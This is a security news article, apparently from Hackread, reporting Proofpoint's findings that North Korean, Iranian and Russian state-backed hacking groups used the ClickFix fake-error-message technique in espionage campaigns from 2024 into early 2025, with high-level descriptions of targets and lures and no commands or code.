North Korea, Iran, Russia-Backed Hackers Deploy ClickFix in New Attacks

Government-backed hacking groups from North Korea (TA427), Iran (TA450), and Russia (UNK_RemoteRogue, TA422) are now using the ClickFix technique in their espionage campaigns. Learn about Proofpoint’s insights into this new wave of attacks.

Proofpoint has recently discovered a concerning development related to the ClickFix attack, a dangerous social engineering method. Reportedly, government-backed hacking groups are now using this technique, exploiting users’ trust by presenting fake error messages or security alerts from the operating system or familiar applications.

Users are tricked into downloading and running a code in their computer’s command line interface, believing it is a solution to their problem. However, when run, this code executes malicious commands on the victim’s machine.

Last year, Hackread.com raised an alarm about the rising popularity of the ClickFix attack among cybercriminals starting in March 2024, after groups like TA571 and ClearFake used it. In October 2024, Sekoia observed a rise in ClickFix attacks involving fake Google Meet, Chrome, and Facebook pages tricking users into downloading malware.

The latest wave of ClickFix attacks was observed between July 2024 and early 2025, with North Korea, Iran, and Russia-backed hackers incorporating ClickFix into their usual operations.

North Korea (TA427)

In early 2025, TA427 (Kimsuky, Emerald Sleet) targeted individuals from 5 organisations in the think tank sector working on North Korea affairs. They used deceptive meeting requests and fake websites to trick them into running PowerShell commands. One successful attack involved impersonating a Japanese diplomat (Ambassador Shigeo Yamada) and led to the installation of QuasarRAT malware.

Iran (TA450)

In November 2024, TA450 (MuddyWater, Mango Sandstorm) targeted 39 organisations, mainly finance and government sectors, in the Middle East with fake Microsoft security update emails. They used ClickFix to persuade users to run PowerShell commands that installed the Level RMM tool, which the attackers intended to use for espionage and data theft. No further use of ClickFix by this group was observed afterwards.

Russia (UNK_RemoteRogue and TA422)

UNK_RemoteRogue used ClickFix once in December 2024, targeting individuals in two prominent arms manufacturing firms in the defence industry, sending emails with a link to a fake Microsoft Office page with Russian instructions to copy/paste code that executed JavaScript and then PowerShell linked to the Empire framework.

TA422 (Sofacy, APT28) employed ClickFix in October 2024, targeting Ukrainian entities, sending phishing emails with a link mimicking a Google spreadsheet sent out by CERT-UA that led to a reCAPTCHA, which, upon clicking, provided a PowerShell command to create an SSH tunnel and run Metasploit.

These groups, however, are not completely changing their attack methods. Instead, they are using ClickFix to replace certain steps in how they initially infect a target’s computer and run malicious software. Also, according to Proofpoint’s blog post, they have not observed any Chinese government-backed groups using ClickFix, possibly due to limited visibility into their activities.

Even though ClickFix is not yet a standard tool for state-sponsored actors, its increasing popularity suggests that this technique could become more common in government-backed cyber espionage campaigns in the coming months, researchers conclude.